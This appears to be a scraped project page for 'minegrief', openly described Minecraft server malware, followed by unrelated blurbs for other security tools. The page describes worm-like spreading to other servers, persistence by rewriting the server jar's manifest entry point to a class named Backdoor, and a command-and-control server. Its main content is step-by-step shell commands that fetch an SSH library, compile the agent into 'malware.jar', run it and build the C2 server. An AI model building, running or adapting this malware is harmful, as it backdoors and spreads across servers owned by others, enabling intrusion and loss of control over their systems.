Self-spreading to other Minecraft servers using an extendable, module-based lateral movement system.
Persistence/stealth by “infecting” the Minecraft server jar file via manifest entry point modification
Lateral movement modules require minegriefagent to be built as a jar file, as modules will copy itself over in a jar to spread.
Download jsch to the root directory of the repository
wget https://repo1.maven.org/maven2/com/github/mwiede/jsch/0.2.17/jsch-0.2.17.jar
unzip jsch-0.2.17.jar
Run this from the root of the repository
rm -rf build-manual
mkdir build-manual
find agent -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
cp -r com/jcraft build-manual/com
echo 'Manifest-Version: 1.0\nMain-Class: net.minecraft.bundler.Backdoor\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm malware.jar manifest.txt -C build-manual .
Run it
<JAVA 1.8 DIR>/bin/java -jar malware.jar
Run this from the root of the repository
rm -rf build-manual
mkdir build-manual
find server -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
echo 'Manifest-Version: 1.0\nMain-Class: com.chebuya.minegriefserver.Main\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm c2-server.jar manifest.txt -C build-manual .
Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes…
zizmor is a static analysis tool for GitHub Actions. It can find many common security…
Stalwart Mail Server is an open-source mail server solution with JMAP, IMAP4, POP3, and SMTP…
Atuin replaces your existing shell history with a SQLite database, and records additional context for…
Dive into the cutting-edge world of digital surveillance with "Spyndicapped," a robust tool leveraging Microsoft's…
Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more…